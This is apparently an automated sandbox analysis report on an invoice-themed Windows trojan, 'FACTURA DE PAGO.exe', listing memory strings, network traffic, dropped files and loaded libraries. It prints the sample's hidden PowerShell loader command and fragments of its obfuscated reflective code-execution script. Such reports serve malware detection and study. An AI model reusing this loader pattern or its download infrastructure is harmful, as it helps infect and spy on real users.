            Source: msiexec.exe, 00000004.00000002.2920754309.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2&export=download
            Source: msiexec.exe, 00000004.00000002.2920754309.000000000540A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2034849572.000000000540A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/j$v
            Source: powershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F50000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FBF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020F7A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186$
            Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000004.00000002.2932772711.0000000022182000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022053000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000221D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000222A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: msiexec.exe, 00000004.00000002.2932772711.0000000021FE4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022280000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022188000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002215D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: msiexec.exe, 00000004.00000002.2932772711.0000000022182000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022053000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000221D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000222A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: msiexec.exe, 00000004.00000002.2932772711.0000000021FE4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022280000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022188000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002215D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000004.00000002.2931722428.00000000210F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000004.00000002.2931722428.00000000210EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405086

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exeJump to dropped file
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_004048C50_2_004048C5
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_004064CB0_2_004064CB
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_00406CA20_2_00406CA2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00BCE2601_2_00BCE260
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EEC1464_2_20EEC146
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EED2784_2_20EED278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EE53624_2_20EE5362
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EEC4684_2_20EEC468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EEC7384_2_20EEC738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EEE9884_2_20EEE988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EECA084_2_20EECA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EECCD84_2_20EECCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EECFAB4_2_20EECFAB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EE71184_2_20EE7118
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EE29E04_2_20EE29E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EEE97B4_2_20EEE97B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EEF9744_2_20EEF974
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EE9DE04_2_20EE9DE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EE3E094_2_20EE3E09
            Source: FACTURA DE PAGO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/14@5/5
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404352
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklensJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeFile created: C:\Users\user\AppData\Local\Temp\nsyF0B8.tmpJump to behavior
            Source: FACTURA DE PAGO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: FACTURA DE PAGO.exeVirustotal: Detection: 20%
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeFile read: C:\Users\user\Desktop\FACTURA DE PAGO.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\FACTURA DE PAGO.exe "C:\Users\user\Desktop\FACTURA DE PAGO.exe"
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: FACTURA DE PAGO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1913479632.0000000008213000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bqm.Core.pdbP source: powershell.exe, 00000001.00000002.1906039371.0000000006F03000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mation.pdb source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.1914582277.0000000008D6C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Cateringens $Sukkersygebehandling $datomrkningens), (Cashewnd @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Flommefedts = [AppDomain]::CurrentDomain.GetA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Prsidiums)), $pushfully).DefineDynamicModule($Srejes, $false).DefineType($Histolaborants, $Omadresserendes, [System.MulticastDelegate]
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"Jump to behavior
